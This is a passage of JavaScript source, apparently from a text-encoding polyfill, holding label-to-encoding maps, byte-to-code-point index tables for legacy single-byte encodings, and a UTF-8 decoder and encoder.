              "x-cp1250"
            ],
            "name": "windows-1250"
        },
        {
            "labels": [
              "cp1251",
              "windows-1251",
              "x-cp1251"
            ],
            "name": "windows-1251"
        },
        {
            "labels": [
              "ansi_x3.4-1968",
              "ascii",
              "cp1252",
              "cp819",
              "csisolatin1",
              "ibm819",
              "iso-8859-1",
              "iso-ir-100",
              "iso8859-1",
              "iso88591",
              "iso_8859-1",
              "iso_8859-1:1987",
              "l1",
              "latin1",
              "us-ascii",
              "windows-1252",
              "x-cp1252"
            ],
            "name": "windows-1252"
        },
        {
            "labels": [
              "cp1253",
              "windows-1253",
              "x-cp1253"
            ],
            "name": "windows-1253"
        },
        {
            "labels": [
              "cp1254",
              "csisolatin5",
              "iso-8859-9",
              "iso-ir-148",
              "iso8859-9",
              "iso88599",
              "iso_8859-9",
              "iso_8859-9:1989",
              "l5",
              "latin5",
              "windows-1254",
              "x-cp1254"
            ],
            "name": "windows-1254"
        },
        {
            "labels": [
              "cp1255",
              "windows-1255",
              "x-cp1255"
            ],
            "name": "windows-1255"
        },
        {
            "labels": [
              "cp1256",
              "windows-1256",
              "x-cp1256"
            ],
            "name": "windows-1256"
        },
        {
            "labels": [
              "cp1257",
              "windows-1257",
              "x-cp1257"
            ],
            "name": "windows-1257"
        },
        {
            "labels": [
              "cp1258",
              "windows-1258",
              "x-cp1258"
            ],
            "name": "windows-1258"
        },
        {
            "labels": [
              "x-mac-cyrillic",
              "x-mac-ukrainian"
            ],
            "name": "x-mac-cyrillic"
        }
      ],
      "heading": "Legacy single-byte encodings"
  },
  {
      "encodings": [
        {
            "labels": [
              "csiso2022kr",
              "iso-2022-kr",
              "iso-2022-cn",
              "iso-2022-cn-ext"
            ],
            "name": "replacement"
        },
        {
            "labels": [
              "utf-16be"
            ],
            "name": "utf-16be"
        },
        {
            "labels": [
              "utf-16",
              "utf-16le"
            ],
            "name": "utf-16le"
        },
        {
            "labels": [
              "x-user-defined"
            ],
            "name": "x-user-defined"
        }
      ],
      "heading": "Legacy miscellaneous encodings"
  }
];

var name_to_encoding = {};
var label_to_encoding = {};
encodings.forEach(function (category) {
    category.encodings.forEach(function (encoding) {
        name_to_encoding[encoding.name] = encoding;
        encoding.labels.forEach(function (label) {
            label_to_encoding[label] = encoding;
        });
    });
});






function indexCodePointFor(pointer, index) {
    return (index || [])[pointer] || null;
}


function indexPointerFor(code_point, index) {
    var pointer = index.indexOf(code_point);
    return pointer === -1 ? null : pointer;
}


var indexes = {
    "ibm864": [176, 183, 8729, 8730, 9618, 9472, 9474, 9532, 9508, 9516, 9500, 9524, 9488, 9484, 9492, 9496, 946, 8734, 966, 177, 189, 188, 8776, 171, 187, 65271, 65272, 155, 156, 65275, 65276, 159, 160, 173, 65154, 163, 164, 65156, null, null, 65166, 65167, 65173, 65177, 1548, 65181, 65185, 65189, 1632, 1633, 1634, 1635, 1636, 1637, 1638, 1639, 1640, 1641, 65233, 1563, 65201, 65205, 65209, 1567, 162, 65152, 65153, 65155, 65157, 65226, 65163, 65165, 65169, 65171, 65175, 65179, 65183, 65187, 65191, 65193, 65195, 65197, 65199, 65203, 65207, 65211, 65215, 65217, 65221, 65227, 65231, 166, 172, 247, 215, 65225, 1600, 65235, 65239, 65243, 65247, 65251, 65255, 65259, 65261, 65263, 65267, 65213, 65228, 65230, 65229, 65249, 65149, 1617, 65253, 65257, 65260, 65264, 65266, 65232, 65237, 65269, 65270, 65245, 65241, 65265, 9632, null],
    "ibm866": [1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 9617, 9618, 9619, 9474, 9508, 9569, 9570, 9558, 9557, 9571, 9553, 9559, 9565, 9564, 9563, 9488, 9492, 9524, 9516, 9500, 9472, 9532, 9566, 9567, 9562, 9556, 9577, 9574, 9568, 9552, 9580, 9575, 9576, 9572, 9573, 9561, 9560, 9554, 9555, 9579, 9578, 9496, 9484, 9608, 9604, 9612, 9616, 9600, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 1103, 1025, 1105, 1028, 1108, 1031, 1111, 1038, 1118, 176, 8729, 183, 8730, 8470, 164, 9632, 160],
    "iso-8859-2": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 260, 728, 321, 164, 317, 346, 167, 168, 352, 350, 356, 377, 173, 381, 379, 176, 261, 731, 322, 180, 318, 347, 711, 184, 353, 351, 357, 378, 733, 382, 380, 340, 193, 194, 258, 196, 313, 262, 199, 268, 201, 280, 203, 282, 205, 206, 270, 272, 323, 327, 211, 212, 336, 214, 215, 344, 366, 218, 368, 220, 221, 354, 223, 341, 225, 226, 259, 228, 314, 263, 231, 269, 233, 281, 235, 283, 237, 238, 271, 273, 324, 328, 243, 244, 337, 246, 247, 345, 367, 250, 369, 252, 253, 355, 729],
    "iso-8859-3": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 294, 728, 163, 164, null, 292, 167, 168, 304, 350, 286, 308, 173, null, 379, 176, 295, 178, 179, 180, 181, 293, 183, 184, 305, 351, 287, 309, 189, null, 380, 192, 193, 194, null, 196, 266, 264, 199, 200, 201, 202, 203, 204, 205, 206, 207, null, 209, 210, 211, 212, 288, 214, 215, 284, 217, 218, 219, 220, 364, 348, 223, 224, 225, 226, null, 228, 267, 265, 231, 232, 233, 234, 235, 236, 237, 238, 239, null, 241, 242, 243, 244, 289, 246, 247, 285, 249, 250, 251, 252, 365, 349, 729],
    "iso-8859-4": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 260, 312, 342, 164, 296, 315, 167, 168, 352, 274, 290, 358, 173, 381, 175, 176, 261, 731, 343, 180, 297, 316, 711, 184, 353, 275, 291, 359, 330, 382, 331, 256, 193, 194, 195, 196, 197, 198, 302, 268, 201, 280, 203, 278, 205, 206, 298, 272, 325, 332, 310, 212, 213, 214, 215, 216, 370, 218, 219, 220, 360, 362, 223, 257, 225, 226, 227, 228, 229, 230, 303, 269, 233, 281, 235, 279, 237, 238, 299, 273, 326, 333, 311, 244, 245, 246, 247, 248, 371, 250, 251, 252, 361, 363, 729],
    "iso-8859-5": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 1025, 1026, 1027, 1028, 1029, 1030, 1031, 1032, 1033, 1034, 1035, 1036, 173, 1038, 1039, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 1103, 8470, 1105, 1106, 1107, 1108, 1109, 1110, 1111, 1112, 1113, 1114, 1115, 1116, 167, 1118, 1119],
    "iso-8859-6": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, null, null, null, 164, null, null, null, null, null, null, null, 1548, 173, null, null, null, null, null, null, null, null, null, null, null, null, null, 1563, null, null, null, 1567, null, 1569, 1570, 1571, 1572, 1573, 1574, 1575, 1576, 1577, 1578, 1579, 1580, 1581, 1582, 1583, 1584, 1585, 1586, 1587, 1588, 1589, 1590, 1591, 1592, 1593, 1594, null, null, null, null, null, 1600, 1601, 1602, 1603, 1604, 1605, 1606, 1607, 1608, 1609, 1610, 1611, 1612, 1613, 1614, 1615, 1616, 1617, 1618, null, null, null, null, null, null, null, null, null, null, null, null, null],
    "iso-8859-7": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 8216, 8217, 163, 8364, 8367, 166, 167, 168, 169, 890, 171, 172, 173, null, 8213, 176, 177, 178, 179, 900, 901, 902, 183, 904, 905, 906, 187, 908, 189, 910, 911, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 928, 929, null, 931, 932, 933, 934, 935, 936, 937, 938, 939, 940, 941, 942, 943, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 954, 955, 956, 957, 958, 959, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, 972, 973, 974, null],
    "iso-8859-8": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, null, 162, 163, 164, 165, 166, 167, 168, 169, 215, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 247, 187, 188, 189, 190, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, null, 8215, 1488, 1489, 1490, 1491, 1492, 1493, 1494, 1495, 1496, 1497, 1498, 1499, 1500, 1501, 1502, 1503, 1504, 1505, 1506, 1507, 1508, 1509, 1510, 1511, 1512, 1513, 1514, null, null, 8206, 8207, null],
    "iso-8859-10": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 260, 274, 290, 298, 296, 310, 167, 315, 272, 352, 358, 381, 173, 362, 330, 176, 261, 275, 291, 299, 297, 311, 183, 316, 273, 353, 359, 382, 8213, 363, 331, 256, 193, 194, 195, 196, 197, 198, 302, 268, 201, 280, 203, 278, 205, 206, 207, 208, 325, 332, 211, 212, 213, 214, 360, 216, 370, 218, 219, 220, 221, 222, 223, 257, 225, 226, 227, 228, 229, 230, 303, 269, 233, 281, 235, 279, 237, 238, 239, 240, 326, 333, 243, 244, 245, 246, 361, 248, 371, 250, 251, 252, 253, 254, 312],
    "iso-8859-13": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 8221, 162, 163, 164, 8222, 166, 167, 216, 169, 342, 171, 172, 173, 174, 198, 176, 177, 178, 179, 8220, 181, 182, 183, 248, 185, 343, 187, 188, 189, 190, 230, 260, 302, 256, 262, 196, 197, 280, 274, 268, 201, 377, 278, 290, 310, 298, 315, 352, 323, 325, 211, 332, 213, 214, 215, 370, 321, 346, 362, 220, 379, 381, 223, 261, 303, 257, 263, 228, 229, 281, 275, 269, 233, 378, 279, 291, 311, 299, 316, 353, 324, 326, 243, 333, 245, 246, 247, 371, 322, 347, 363, 252, 380, 382, 8217],
    "iso-8859-14": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 7682, 7683, 163, 266, 267, 7690, 167, 7808, 169, 7810, 7691, 7922, 173, 174, 376, 7710, 7711, 288, 289, 7744, 7745, 182, 7766, 7809, 7767, 7811, 7776, 7923, 7812, 7813, 7777, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 372, 209, 210, 211, 212, 213, 214, 7786, 216, 217, 218, 219, 220, 221, 374, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 373, 241, 242, 243, 244, 245, 246, 7787, 248, 249, 250, 251, 252, 253, 375, 255],
    "iso-8859-15": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 8364, 165, 352, 167, 353, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 381, 181, 182, 183, 382, 185, 186, 187, 338, 339, 376, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255],
    "iso-8859-16": [128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 260, 261, 321, 8364, 8222, 352, 167, 353, 169, 536, 171, 377, 173, 378, 379, 176, 177, 268, 322, 381, 8221, 182, 183, 382, 269, 537, 187, 338, 339, 376, 380, 192, 193, 194, 258, 196, 262, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 272, 323, 210, 211, 212, 336, 214, 346, 368, 217, 218, 219, 220, 280, 538, 223, 224, 225, 226, 259, 228, 263, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 273, 324, 242, 243, 244, 337, 246, 347, 369, 249, 250, 251, 252, 281, 539, 255],
    "koi8-r": [9472, 9474, 9484, 9488, 9492, 9496, 9500, 9508, 9516, 9524, 9532, 9600, 9604, 9608, 9612, 9616, 9617, 9618, 9619, 8992, 9632, 8729, 8730, 8776, 8804, 8805, 160, 8993, 176, 178, 183, 247, 9552, 9553, 9554, 1105, 9555, 9556, 9557, 9558, 9559, 9560, 9561, 9562, 9563, 9564, 9565, 9566, 9567, 9568, 9569, 1025, 9570, 9571, 9572, 9573, 9574, 9575, 9576, 9577, 9578, 9579, 9580, 169, 1102, 1072, 1073, 1094, 1076, 1077, 1092, 1075, 1093, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1103, 1088, 1089, 1090, 1091, 1078, 1074, 1100, 1099, 1079, 1096, 1101, 1097, 1095, 1098, 1070, 1040, 1041, 1062, 1044, 1045, 1060, 1043, 1061, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1071, 1056, 1057, 1058, 1059, 1046, 1042, 1068, 1067, 1047, 1064, 1069, 1065, 1063, 1066],
    "koi8-u": [9472, 9474, 9484, 9488, 9492, 9496, 9500, 9508, 9516, 9524, 9532, 9600, 9604, 9608, 9612, 9616, 9617, 9618, 9619, 8992, 9632, 8729, 8730, 8776, 8804, 8805, 160, 8993, 176, 178, 183, 247, 9552, 9553, 9554, 1105, 1108, 9556, 1110, 1111, 9559, 9560, 9561, 9562, 9563, 1169, 9565, 9566, 9567, 9568, 9569, 1025, 1028, 9571, 1030, 1031, 9574, 9575, 9576, 9577, 9578, 1168, 9580, 169, 1102, 1072, 1073, 1094, 1076, 1077, 1092, 1075, 1093, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1103, 1088, 1089, 1090, 1091, 1078, 1074, 1100, 1099, 1079, 1096, 1101, 1097, 1095, 1098, 1070, 1040, 1041, 1062, 1044, 1045, 1060, 1043, 1061, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1071, 1056, 1057, 1058, 1059, 1046, 1042, 1068, 1067, 1047, 1064, 1069, 1065, 1063, 1066],
    "macintosh": [196, 197, 199, 201, 209, 214, 220, 225, 224, 226, 228, 227, 229, 231, 233, 232, 234, 235, 237, 236, 238, 239, 241, 243, 242, 244, 246, 245, 250, 249, 251, 252, 8224, 176, 162, 163, 167, 8226, 182, 223, 174, 169, 8482, 180, 168, 8800, 198, 216, 8734, 177, 8804, 8805, 165, 181, 8706, 8721, 8719, 960, 8747, 170, 186, 937, 230, 248, 191, 161, 172, 8730, 402, 8776, 8710, 171, 187, 8230, 160, 192, 195, 213, 338, 339, 8211, 8212, 8220, 8221, 8216, 8217, 247, 9674, 255, 376, 8260, 8364, 8249, 8250, 64257, 64258, 8225, 183, 8218, 8222, 8240, 194, 202, 193, 203, 200, 205, 206, 207, 204, 211, 212, 63743, 210, 218, 219, 217, 305, 710, 732, 175, 728, 729, 730, 184, 733, 731, 711],
    "windows-874": [8364, 129, 130, 131, 132, 8230, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 152, 153, 154, 155, 156, 157, 158, 159, 160, 3585, 3586, 3587, 3588, 3589, 3590, 3591, 3592, 3593, 3594, 3595, 3596, 3597, 3598, 3599, 3600, 3601, 3602, 3603, 3604, 3605, 3606, 3607, 3608, 3609, 3610, 3611, 3612, 3613, 3614, 3615, 3616, 3617, 3618, 3619, 3620, 3621, 3622, 3623, 3624, 3625, 3626, 3627, 3628, 3629, 3630, 3631, 3632, 3633, 3634, 3635, 3636, 3637, 3638, 3639, 3640, 3641, 3642, null, null, null, null, 3647, 3648, 3649, 3650, 3651, 3652, 3653, 3654, 3655, 3656, 3657, 3658, 3659, 3660, 3661, 3662, 3663, 3664, 3665, 3666, 3667, 3668, 3669, 3670, 3671, 3672, 3673, 3674, 3675, null, null, null, null],
    "windows-1250": [8364, 129, 8218, 131, 8222, 8230, 8224, 8225, 136, 8240, 352, 8249, 346, 356, 381, 377, 144, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 152, 8482, 353, 8250, 347, 357, 382, 378, 160, 711, 728, 321, 164, 260, 166, 167, 168, 169, 350, 171, 172, 173, 174, 379, 176, 177, 731, 322, 180, 181, 182, 183, 184, 261, 351, 187, 317, 733, 318, 380, 340, 193, 194, 258, 196, 313, 262, 199, 268, 201, 280, 203, 282, 205, 206, 270, 272, 323, 327, 211, 212, 336, 214, 215, 344, 366, 218, 368, 220, 221, 354, 223, 341, 225, 226, 259, 228, 314, 263, 231, 269, 233, 281, 235, 283, 237, 238, 271, 273, 324, 328, 243, 244, 337, 246, 247, 345, 367, 250, 369, 252, 253, 355, 729],
    "windows-1251": [1026, 1027, 8218, 1107, 8222, 8230, 8224, 8225, 8364, 8240, 1033, 8249, 1034, 1036, 1035, 1039, 1106, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 152, 8482, 1113, 8250, 1114, 1116, 1115, 1119, 160, 1038, 1118, 1032, 164, 1168, 166, 167, 1025, 169, 1028, 171, 172, 173, 174, 1031, 176, 177, 1030, 1110, 1169, 181, 182, 183, 1105, 8470, 1108, 187, 1112, 1029, 1109, 1111, 1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 1103],
    "windows-1252": [8364, 129, 8218, 402, 8222, 8230, 8224, 8225, 710, 8240, 352, 8249, 338, 141, 381, 143, 144, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 732, 8482, 353, 8250, 339, 157, 382, 376, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255],
    "windows-1253": [8364, 129, 8218, 402, 8222, 8230, 8224, 8225, 136, 8240, 138, 8249, 140, 141, 142, 143, 144, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 152, 8482, 154, 8250, 156, 157, 158, 159, 160, 901, 902, 163, 164, 165, 166, 167, 168, 169, null, 171, 172, 173, 174, 8213, 176, 177, 178, 179, 900, 181, 182, 183, 904, 905, 906, 187, 908, 189, 910, 911, 912, 913, 914, 915, 916, 917, 918, 919, 920, 921, 922, 923, 924, 925, 926, 927, 928, 929, null, 931, 932, 933, 934, 935, 936, 937, 938, 939, 940, 941, 942, 943, 944, 945, 946, 947, 948, 949, 950, 951, 952, 953, 954, 955, 956, 957, 958, 959, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, 972, 973, 974, null],
    "windows-1254": [8364, 129, 8218, 402, 8222, 8230, 8224, 8225, 710, 8240, 352, 8249, 338, 141, 142, 143, 144, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 732, 8482, 353, 8250, 339, 157, 158, 376, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 286, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 304, 350, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 287, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 305, 351, 255],
    "windows-1255": [8364, 129, 8218, 402, 8222, 8230, 8224, 8225, 710, 8240, 138, 8249, 140, 141, 142, 143, 144, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 732, 8482, 154, 8250, 156, 157, 158, 159, 160, 161, 162, 163, 8362, 165, 166, 167, 168, 169, 215, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 247, 187, 188, 189, 190, 191, 1456, 1457, 1458, 1459, 1460, 1461, 1462, 1463, 1464, 1465, null, 1467, 1468, 1469, 1470, 1471, 1472, 1473, 1474, 1475, 1520, 1521, 1522, 1523, 1524, null, null, null, null, null, null, null, 1488, 1489, 1490, 1491, 1492, 1493, 1494, 1495, 1496, 1497, 1498, 1499, 1500, 1501, 1502, 1503, 1504, 1505, 1506, 1507, 1508, 1509, 1510, 1511, 1512, 1513, 1514, null, null, 8206, 8207, null],
    "windows-1256": [8364, 1662, 8218, 402, 8222, 8230, 8224, 8225, 710, 8240, 1657, 8249, 338, 1670, 1688, 1672, 1711, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 1705, 8482, 1681, 8250, 339, 8204, 8205, 1722, 160, 1548, 162, 163, 164, 165, 166, 167, 168, 169, 1726, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 1563, 187, 188, 189, 190, 1567, 1729, 1569, 1570, 1571, 1572, 1573, 1574, 1575, 1576, 1577, 1578, 1579, 1580, 1581, 1582, 1583, 1584, 1585, 1586, 1587, 1588, 1589, 1590, 215, 1591, 1592, 1593, 1594, 1600, 1601, 1602, 1603, 224, 1604, 226, 1605, 1606, 1607, 1608, 231, 232, 233, 234, 235, 1609, 1610, 238, 239, 1611, 1612, 1613, 1614, 244, 1615, 1616, 247, 1617, 249, 1618, 251, 252, 8206, 8207, 1746],
    "windows-1257": [8364, 129, 8218, 131, 8222, 8230, 8224, 8225, 136, 8240, 138, 8249, 140, 168, 711, 184, 144, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 152, 8482, 154, 8250, 156, 175, 731, 159, 160, null, 162, 163, 164, null, 166, 167, 216, 169, 342, 171, 172, 173, 174, 198, 176, 177, 178, 179, 180, 181, 182, 183, 248, 185, 343, 187, 188, 189, 190, 230, 260, 302, 256, 262, 196, 197, 280, 274, 268, 201, 377, 278, 290, 310, 298, 315, 352, 323, 325, 211, 332, 213, 214, 215, 370, 321, 346, 362, 220, 379, 381, 223, 261, 303, 257, 263, 228, 229, 281, 275, 269, 233, 378, 279, 291, 311, 299, 316, 353, 324, 326, 243, 333, 245, 246, 247, 371, 322, 347, 363, 252, 380, 382, 729],
    "windows-1258": [8364, 129, 8218, 402, 8222, 8230, 8224, 8225, 710, 8240, 138, 8249, 338, 141, 142, 143, 144, 8216, 8217, 8220, 8221, 8226, 8211, 8212, 732, 8482, 154, 8250, 339, 157, 158, 376, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 258, 196, 197, 198, 199, 200, 201, 202, 203, 768, 205, 206, 207, 272, 209, 777, 211, 212, 416, 214, 215, 216, 217, 218, 219, 220, 431, 771, 223, 224, 225, 226, 259, 228, 229, 230, 231, 232, 233, 234, 235, 769, 237, 238, 239, 273, 241, 803, 243, 244, 417, 246, 247, 248, 249, 250, 251, 252, 432, 8363, 255],
    "x-mac-cyrillic": [1040, 1041, 1042, 1043, 1044, 1045, 1046, 1047, 1048, 1049, 1050, 1051, 1052, 1053, 1054, 1055, 1056, 1057, 1058, 1059, 1060, 1061, 1062, 1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 8224, 176, 1168, 163, 167, 8226, 182, 1030, 174, 169, 8482, 1026, 1106, 8800, 1027, 1107, 8734, 177, 8804, 8805, 1110, 181, 1169, 1032, 1028, 1108, 1031, 1111, 1033, 1113, 1034, 1114, 1112, 1029, 172, 8730, 402, 8776, 8710, 171, 187, 8230, 160, 1035, 1115, 1036, 1116, 1109, 8211, 8212, 8220, 8221, 8216, 8217, 247, 8222, 1038, 1118, 1039, 1119, 8470, 1025, 1105, 1103, 1072, 1073, 1074, 1075, 1076, 1077, 1078, 1079, 1080, 1081, 1082, 1083, 1084, 1085, 1086, 1087, 1088, 1089, 1090, 1091, 1092, 1093, 1094, 1095, 1096, 1097, 1098, 1099, 1100, 1101, 1102, 8364]
}








function UTF8Decoder(options) {
    var fatal = options.fatal;
    var  utf8_code_point = 0,
         utf8_bytes_needed = 0,
         utf8_bytes_seen = 0,
         utf8_lower_boundary = 0;

    
    this.decode = function (byte_pointer) {
        var bite = byte_pointer.get();
        if (bite === EOF_byte) {
            if (utf8_bytes_needed !== 0) {
                return decoderError(fatal);
            }
            return EOF_code_point;
        }
        byte_pointer.offset(1);

        if (utf8_bytes_needed === 0) {
            if (inRange(bite, 0x00, 0x7F)) {
                return bite;
            }
            if (inRange(bite, 0xC2, 0xDF)) {
                utf8_bytes_needed = 1;
                utf8_lower_boundary = 0x80;
                utf8_code_point = bite - 0xC0;
            } else if (inRange(bite, 0xE0, 0xEF)) {
                utf8_bytes_needed = 2;
                utf8_lower_boundary = 0x800;
                utf8_code_point = bite - 0xE0;
            } else if (inRange(bite, 0xF0, 0xF4)) {
                utf8_bytes_needed = 3;
                utf8_lower_boundary = 0x10000;
                utf8_code_point = bite - 0xF0;
            } else {
                return decoderError(fatal);
            }
            utf8_code_point = utf8_code_point * Math.pow(64, utf8_bytes_needed);
            return null;
        }
        if (!inRange(bite, 0x80, 0xBF)) {
            utf8_code_point = 0;
            utf8_bytes_needed = 0;
            utf8_bytes_seen = 0;
            utf8_lower_boundary = 0;
            byte_pointer.offset(-1);
            return decoderError(fatal);
        }
        utf8_bytes_seen += 1;
        utf8_code_point = utf8_code_point + (bite - 0x80) *
            Math.pow(64, utf8_bytes_needed - utf8_bytes_seen);
        if (utf8_bytes_seen !== utf8_bytes_needed) {
            return null;
        }
        var code_point = utf8_code_point;
        var lower_boundary = utf8_lower_boundary;
        utf8_code_point = 0;
        utf8_bytes_needed = 0;
        utf8_bytes_seen = 0;
        utf8_lower_boundary = 0;
        if (inRange(code_point, lower_boundary, 0x10FFFF) &&
            !inRange(code_point, 0xD800, 0xDFFF)) {
            return code_point;
        }
        return decoderError(fatal);
    };
}


function UTF8Encoder(options) {
    var fatal = options.fatal;
    
    this.encode = function (output_byte_stream, code_point_pointer) {
        var code_point = code_point_pointer.get();
        if (code_point === EOF_code_point) {
            return EOF_byte;
        }
        code_point_pointer.offset(1);
        if (inRange(code_point, 0xD800, 0xDFFF)) {
            return encoderError(code_point);
        }
        if (inRange(code_point, 0x0000, 0x007f)) {
            return output_byte_stream.emit(code_point);
        }
        var count, offset;
        if (inRange(code_point, 0x0080, 0x07FF)) {
            count = 1;
            offset = 0xC0;
        } else if (inRange(code_point, 0x0800, 0xFFFF)) {
            count = 2;
            offset = 0xE0;
        } else if (inRange(code_point, 0x10000, 0x10FFFF)) {
            count = 3;
            offset = 0xF0;
        }
        var result = output_byte_stream.emit(
            div(code_point, Math.pow(64, count)) + offset);
        while (count > 0) {
            var temp = div(code_point, Math.pow(64, count - 1));
            result = output_byte_stream.emit(0x80 + (temp % 64));
            count -= 1;
        }
        return result;
    };
}

name_to_encoding['utf-8'].getEncoder = function (options) {
    return new UTF8Encoder(options);
};
name_to_encoding['utf-8'].getDecoder = function (options) {
    return new UTF8Decoder(options);
};






